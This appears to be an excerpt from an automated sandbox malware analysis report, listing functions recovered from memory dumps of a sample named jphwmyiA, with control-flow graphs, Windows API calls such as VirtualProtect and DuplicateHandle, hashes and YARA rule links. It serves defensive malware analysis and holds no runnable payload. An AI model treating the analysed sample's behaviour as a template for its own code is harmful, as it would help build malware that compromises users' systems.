                                                                                                                                            • Source File: 0000000A.00000002.3765726415.00000000250B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250b0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 74fcda423fa9d9200c44e6a0321ae469add940fb9d75638b1617b24023c4710e
                                                                                                                                            • Instruction ID: 112b95c7ba531fa76fb409875608f506d7ff3a01bacd49be2d9bfd4e5fbeed48
                                                                                                                                            • Opcode Fuzzy Hash: 74fcda423fa9d9200c44e6a0321ae469add940fb9d75638b1617b24023c4710e
                                                                                                                                            • Instruction Fuzzy Hash: BE41C3B1D006088BEB18DFAAD8947DEBBF2BF88304F24C069C418BB255DB755A46CF54
                                                                                                                                            Function 250465B0 Relevance: .1, Instructions: 114COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765563475.0000000025040000.00000040.00000800.00020000.00000000.sdmp, Offset: 25040000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25040000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: cb83d51a4e7b58ddef7782da97b4638a08b05cc0aaf41fe3115729f4e72f0e31
                                                                                                                                            • Instruction ID: edbb8ff639756ed91b5aa0bb0e53fe0a4faf5125fc4498a2e3d6301da132f4ed
                                                                                                                                            • Opcode Fuzzy Hash: cb83d51a4e7b58ddef7782da97b4638a08b05cc0aaf41fe3115729f4e72f0e31
                                                                                                                                            • Instruction Fuzzy Hash: 1041B5B1D006088BEB18DFAAD8447DEBBF2BF89304F24D06AD418BB254EB355945CF55
                                                                                                                                            Function 25047AE0 Relevance: .1, Instructions: 102COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765563475.0000000025040000.00000040.00000800.00020000.00000000.sdmp, Offset: 25040000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25040000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: cc19d3b40ce80e82ad5409441efb0ed69ef0ef36a6968c6f8f02bf2d380c95f8
                                                                                                                                            • Instruction ID: 6d8f229c78ffb4f3eb87f57c092c771d42b84fb1506db39effa481f4dd46223c
                                                                                                                                            • Opcode Fuzzy Hash: cc19d3b40ce80e82ad5409441efb0ed69ef0ef36a6968c6f8f02bf2d380c95f8
                                                                                                                                            • Instruction Fuzzy Hash: 1F41D5B0E056488BDB18CFAAD8546DEFBF2BF89304F24D43AC418AB255DB356946CF50
                                                                                                                                            Function 250E09BF Relevance: .1, Instructions: 101COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765907332.00000000250E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250E0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250e0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: b91310a7322ed6911e2592fae30ce285eec608ed06c6451c8bee7815c98f3d18
                                                                                                                                            • Instruction ID: a0a2ebe23a63dac9d341d08ad755ee05ad3eeb3233df72ea55189f44498e85c5
                                                                                                                                            • Opcode Fuzzy Hash: b91310a7322ed6911e2592fae30ce285eec608ed06c6451c8bee7815c98f3d18
                                                                                                                                            • Instruction Fuzzy Hash: D141C271E01218CBDB18DFAAD854B9EBBF2BF89304F24D06AD818AB254DB345946CF40
                                                                                                                                            Function 250B4F98 Relevance: .1, Instructions: 100COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765726415.00000000250B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250b0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: e2b863c28de898ab011ca3e97634059187446e1858dd0148c9d054f7bcc8b051
                                                                                                                                            • Instruction ID: 0f60cfe63da3dd11ad91260c3a76df055d5acb737d7c8659e53fabe5fecefd89
                                                                                                                                            • Opcode Fuzzy Hash: e2b863c28de898ab011ca3e97634059187446e1858dd0148c9d054f7bcc8b051
                                                                                                                                            • Instruction Fuzzy Hash: 9141F371E006188BDB18DFAAD8946DEBBF2BF89304F10D069C418BB259EB346946CF50
                                                                                                                                            Function 250EEB1F Relevance: .1, Instructions: 96COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765907332.00000000250E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250E0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250e0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 63712c08e70817159d23497c90fe1a437ded1f3bb487d75019f2348f103deb85
                                                                                                                                            • Instruction ID: 549bb1bd2e348a7b0e8ad0bfc44db9c38803af20322735f75b20285e2d686269
                                                                                                                                            • Opcode Fuzzy Hash: 63712c08e70817159d23497c90fe1a437ded1f3bb487d75019f2348f103deb85
                                                                                                                                            • Instruction Fuzzy Hash: A431D675E016188FDB08DFA6D84069DBBF2BF89300F24D469D418BB258DB346906CF51
                                                                                                                                            Function 250E7140 Relevance: .1, Instructions: 94COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765907332.00000000250E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250E0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250e0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 9ddd19107cb5cd09d3e9dc1121ac3e65a6c2e35c0733521406ddff7f0d5bfe9b
                                                                                                                                            • Instruction ID: 73b07d67d05418f98fb14dbf69520bd73c5bd5fdc600630581a02a748a7bb1bc
                                                                                                                                            • Opcode Fuzzy Hash: 9ddd19107cb5cd09d3e9dc1121ac3e65a6c2e35c0733521406ddff7f0d5bfe9b
                                                                                                                                            • Instruction Fuzzy Hash: DA31C974E052488FDB14DFAAD8506DEFBF2AF89300F20D02AD518BB254DB356906CF51
                                                                                                                                            Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 816 4018f0-4018fa 817 401903-40193e lstrlenA call 4017e0 MultiByteToWideChar 816->817 818 4018fc-401900 816->818 821 401940-401949 GetLastError 817->821 822 401996-40199a 817->822 823 40194b-40198c MultiByteToWideChar call 4017e0 MultiByteToWideChar 821->823 824 40198d-40198f 821->824 823->824 824->822 825 401991 call 401030 824->825 825->822
                                                                                                                                            APIs
                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                                            • GetLastError.KERNEL32 ref: 00401940
                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_jphwmyiA.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3322701435-0
                                                                                                                                            • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                            • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                                                                            • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                            • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                                                                                            Function 2525DD81 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1160 2525dd81-2525de1f GetCurrentProcess 1165 2525de21-2525de27 1160->1165 1166 2525de28-2525de5c GetCurrentThread 1160->1166 1165->1166 1167 2525de65-2525de99 GetCurrentProcess 1166->1167 1168 2525de5e-2525de64 1166->1168 1170 2525dea2-2525debd call 2525df5f 1167->1170 1171 2525de9b-2525dea1 1167->1171 1168->1167 1174 2525dec3-2525def2 GetCurrentThreadId 1170->1174 1171->1170 1175 2525def4-2525defa 1174->1175 1176 2525defb-2525df5d 1174->1176 1175->1176
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 2525DE0E
                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 2525DE4B
                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 2525DE88
                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 2525DEE1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3766131011.0000000025250000.00000040.00000800.00020000.00000000.sdmp, Offset: 25250000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25250000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2063062207-0
                                                                                                                                            • Opcode ID: 4adb75602efd7bef64a165b8618dc2fc8adbcc720a59535cbd35a3ea11f223c4
                                                                                                                                            • Instruction ID: b31566a91b265932c4d9fddcf1ad87c95191fabb0c4d8be2451db8c951b7ac68
                                                                                                                                            • Opcode Fuzzy Hash: 4adb75602efd7bef64a165b8618dc2fc8adbcc720a59535cbd35a3ea11f223c4
                                                                                                                                            • Instruction Fuzzy Hash: 8A5138B09013498FDB08DFA9C988B9EBBF5FF49310F208559E00AA7360D7B86D44CB65
                                                                                                                                            Function 2525DD90 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1183 2525dd90-2525de1f GetCurrentProcess 1187 2525de21-2525de27 1183->1187 1188 2525de28-2525de5c GetCurrentThread 1183->1188 1187->1188 1189 2525de65-2525de99 GetCurrentProcess 1188->1189 1190 2525de5e-2525de64 1188->1190 1192 2525dea2-2525debd call 2525df5f 1189->1192 1193 2525de9b-2525dea1 1189->1193 1190->1189 1196 2525dec3-2525def2 GetCurrentThreadId 1192->1196 1193->1192 1197 2525def4-2525defa 1196->1197 1198 2525defb-2525df5d 1196->1198 1197->1198
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 2525DE0E
                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 2525DE4B
                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 2525DE88
                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 2525DEE1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3766131011.0000000025250000.00000040.00000800.00020000.00000000.sdmp, Offset: 25250000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25250000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2063062207-0
                                                                                                                                            • Opcode ID: 9cab3d1249cad135e4db5d9e6d78cfd0532ee58ec5c4a47b232deaf9b6c2879d
                                                                                                                                            • Instruction ID: ee16e24b8b971f3725cc5b47cc319112c57f61ac0b69e4df401c0be6f3336c0f
                                                                                                                                            • Opcode Fuzzy Hash: 9cab3d1249cad135e4db5d9e6d78cfd0532ee58ec5c4a47b232deaf9b6c2879d
                                                                                                                                            • Instruction Fuzzy Hash: 3F5138B09013098FDB18DFAAC588B9EBBF5FF48314F208559E00AA7360D7B86944CB65
                                                                                                                                            Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1205 40af66-40af6e 1206 40af7d-40af88 call 40b84d 1205->1206 1209 40af70-40af7b call 40d2e3 1206->1209 1210 40af8a-40af8b 1206->1210 1209->1206 1213 40af8c-40af98 1209->1213 1214 40afb3-40afca call 40af49 call 40cd39 1213->1214 1215 40af9a-40afb2 call 40aefc call 40d2bd 1213->1215 1215->1214
                                                                                                                                            APIs
                                                                                                                                            • _malloc.LIBCMT ref: 0040AF80
                                                                                                                                              • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                              • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                              • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                            • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                                              • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_jphwmyiA.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1411284514-0
                                                                                                                                            • Opcode ID: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
                                                                                                                                            • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                                            • Opcode Fuzzy Hash: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
                                                                                                                                            • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                                                                            Function 250FD9B0 Relevance: 2.7, Strings: 2, Instructions: 229COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765984605.00000000250F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 250F0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_250f0000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: LR]q$LR]q
                                                                                                                                            • API String ID: 0-3917262905
                                                                                                                                            • Opcode ID: 5223acfb7fb46ee1f50549903e6e113f1a3270df16b9464283ae19626d8d8045
                                                                                                                                            • Instruction ID: b5982e45c65e441ce5523c58ceb8287fe72eb178d496a2ee6fa1e078adcb0bdb
                                                                                                                                            • Opcode Fuzzy Hash: 5223acfb7fb46ee1f50549903e6e113f1a3270df16b9464283ae19626d8d8045
                                                                                                                                            • Instruction Fuzzy Hash: 9181AE357141158FC708DF78D854E5E77F2BF88604B2181A9E506DB3A1DE34EC02CB91
                                                                                                                                            Function 25047520 Relevance: 2.7, Strings: 2, Instructions: 207COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765563475.0000000025040000.00000040.00000800.00020000.00000000.sdmp, Offset: 25040000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25040000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: (&]q$(aq
                                                                                                                                            • API String ID: 0-1602648543
                                                                                                                                            • Opcode ID: 31d52e081f18793a049156b3b6dafe279cd299ecbda6497f36a2e2b4efb8e242
                                                                                                                                            • Instruction ID: 5a925be933767cc5e71c3efcb6b4ee25cd8c80ffb4fdc60e864843fc21ef0c15
                                                                                                                                            • Opcode Fuzzy Hash: 31d52e081f18793a049156b3b6dafe279cd299ecbda6497f36a2e2b4efb8e242
                                                                                                                                            • Instruction Fuzzy Hash: 39718E31F042199BDB15DFA9D850AEEBBF2AF89700F108469D416A7390DF34AD46CB91
                                                                                                                                            Function 2525B234 Relevance: 1.7, APIs: 1, Instructions: 217COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 2525B401
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3766131011.0000000025250000.00000040.00000800.00020000.00000000.sdmp, Offset: 25250000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25250000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 716092398-0
                                                                                                                                            • Opcode ID: 884ea1177e39d38ce646f1179497a39fd56f9e4e6212f44ba7a500f476fb8815
                                                                                                                                            • Instruction ID: 5f126721acaac00a1b60963cce9363779578bcdab46ef940701a7dbf29d59380
                                                                                                                                            • Opcode Fuzzy Hash: 884ea1177e39d38ce646f1179497a39fd56f9e4e6212f44ba7a500f476fb8815
                                                                                                                                            • Instruction Fuzzy Hash: AE91C0B5D04259DFCF11CFA8C984ADDBBF1BF09300F14919AE908AB261D735A985CF51
                                                                                                                                            Function 2525B240 Relevance: 1.7, APIs: 1, Instructions: 182COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 2525B401
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3766131011.0000000025250000.00000040.00000800.00020000.00000000.sdmp, Offset: 25250000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25250000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 716092398-0
                                                                                                                                            • Opcode ID: 65846208c5057cb08ecfd38533f1d741d1178b5f1efa6593d020ef990f464904
                                                                                                                                            • Instruction ID: b8d9a62898e800b6ad9c043eb4d0c3827cb8f29781f9063e077da2521150e722
                                                                                                                                            • Opcode Fuzzy Hash: 65846208c5057cb08ecfd38533f1d741d1178b5f1efa6593d020ef990f464904
                                                                                                                                            • Instruction Fuzzy Hash: F0718CB4D00218DFDF21CFA9D984ADDBBF1BF09310F1091AAE508A7251D774AA85CF55
                                                                                                                                            Function 2503B43C Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765507627.0000000025030000.00000040.00000800.00020000.00000000.sdmp, Offset: 25030000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25030000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 62421f1be73146788e51540e97ff17a5c99034d7f782c9e2ad28ff654b8551e5
                                                                                                                                            • Instruction ID: 28b1f2bc3c018b6ca0d993d1d75e3310faedbabd87dc93638b80b4218b729401
                                                                                                                                            • Opcode Fuzzy Hash: 62421f1be73146788e51540e97ff17a5c99034d7f782c9e2ad28ff654b8551e5
                                                                                                                                            • Instruction Fuzzy Hash: F6415E74A04118DFCB14EF98E8C1ADDBBB2FF59318F609159D409A7241CB35AD82CF50
                                                                                                                                            Function 2525DFD1 Relevance: 1.6, APIs: 1, Instructions: 109COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 2525E0A3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3766131011.0000000025250000.00000040.00000800.00020000.00000000.sdmp, Offset: 25250000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25250000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3793708945-0
                                                                                                                                            • Opcode ID: 033cab75b2be88c57253241a7bcd4ba9e0974df6d0bad8023ae41b17293f49aa
                                                                                                                                            • Instruction ID: 40f2e4263ded7ecec725fa5184e899dde7ca4a82fbd21a0459a43f702c74481c
                                                                                                                                            • Opcode Fuzzy Hash: 033cab75b2be88c57253241a7bcd4ba9e0974df6d0bad8023ae41b17293f49aa
                                                                                                                                            • Instruction Fuzzy Hash: AC4166B9D002589FCF10CFA9D984ADEBBF5BB09310F14906AE918BB350D375A945CF54
                                                                                                                                            Function 2525DFD8 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 2525E0A3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3766131011.0000000025250000.00000040.00000800.00020000.00000000.sdmp, Offset: 25250000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25250000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3793708945-0
                                                                                                                                            • Opcode ID: 6d47b503503b86b0bc4337437609fa6604f6d9aca9464b1e4c189216f390d467
                                                                                                                                            • Instruction ID: 8ab4002e33ce169a6a934173512283bb09beb45694cba78d2bb44d3deb870e8e
                                                                                                                                            • Opcode Fuzzy Hash: 6d47b503503b86b0bc4337437609fa6604f6d9aca9464b1e4c189216f390d467
                                                                                                                                            • Instruction Fuzzy Hash: 6D4156B9D002589FCF10CFA9D984ADEBBF5BB09310F24906AE918BB350D375A945CF94
                                                                                                                                            Function 2503B3DC Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765507627.0000000025030000.00000040.00000800.00020000.00000000.sdmp, Offset: 25030000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25030000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a96c09f6aceb4204945ed710e9135daa727dde753a5172ef6a576169ab8c1780
                                                                                                                                            • Instruction ID: 74c136ed0e284934dca9fbd4cb138f9704d8eb2322973e55eb1385401439dae7
                                                                                                                                            • Opcode Fuzzy Hash: a96c09f6aceb4204945ed710e9135daa727dde753a5172ef6a576169ab8c1780
                                                                                                                                            • Instruction Fuzzy Hash: FA411874A04218EFCB14DF98E881AEDBBB2FF48318F609159D405AB291CB35A986CF50
                                                                                                                                            Function 2503B2A0 Relevance: 1.6, APIs: 1, Instructions: 100libraryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3765507627.0000000025030000.00000040.00000800.00020000.00000000.sdmp, Offset: 25030000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25030000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 7656609f93498754d875805f565d4bf43a9298d54c9e0ba7f4f2b457b440cfd8
                                                                                                                                            • Instruction ID: 980a4bcb93ee59d134a56d042e2283f679bd2db949d487bd972b1b0a36ec6631
                                                                                                                                            • Opcode Fuzzy Hash: 7656609f93498754d875805f565d4bf43a9298d54c9e0ba7f4f2b457b440cfd8
                                                                                                                                            • Instruction Fuzzy Hash: AF4159B0E04218DBDB14DF99D985ADDFBF2BF88314F24D169D4046B285CB31A986CF90
                                                                                                                                            Function 2525E4A4 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 2525F351
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3766131011.0000000025250000.00000040.00000800.00020000.00000000.sdmp, Offset: 25250000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_25250000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CallProcWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2714655100-0
                                                                                                                                            • Opcode ID: ac4d43a2a9c59d900b5bdd00ae9d98e8a7107fe6a09ec800311634ea9492b5a8
                                                                                                                                            • Instruction ID: 9387bd1cf56854b8d5df73f406e18fae1144ac881e8a56314bb76277ea5a1a45
                                                                                                                                            • Opcode Fuzzy Hash: ac4d43a2a9c59d900b5bdd00ae9d98e8a7107fe6a09ec800311634ea9492b5a8
                                                                                                                                            • Instruction Fuzzy Hash: 2D4128B4900245DFDB08CF99C884AAABBF5FF88310F24C559D519A7361D774A941CFA0
                                                                                                                                            Function 20E5EE60 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 20E5EF04
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3758183660.0000000020E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 20E50000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_20e50000_jphwmyiA.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ProtectVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 544645111-0
                                                                                                                                            • Opcode ID: cbc58e61ca6fedaf302b2135e6f742c729cedfefe6cad8d25e59154482fd486a
                                                                                                                                            • Instruction ID: aae95346f0ea64f838fcf0547037ca73ba7c32a79938a16d6ee1dd010f5cf277
                                                                                                                                            • Opcode Fuzzy Hash: cbc58e61ca6fedaf302b2135e6f742c729cedfefe6cad8d25e59154482fd486a
                                                                                                                                            • Instruction Fuzzy Hash: D23198B8D012489FCB14DFA9D980A9EFBF1BF49310F20942AE819B7210D775A945CFA4
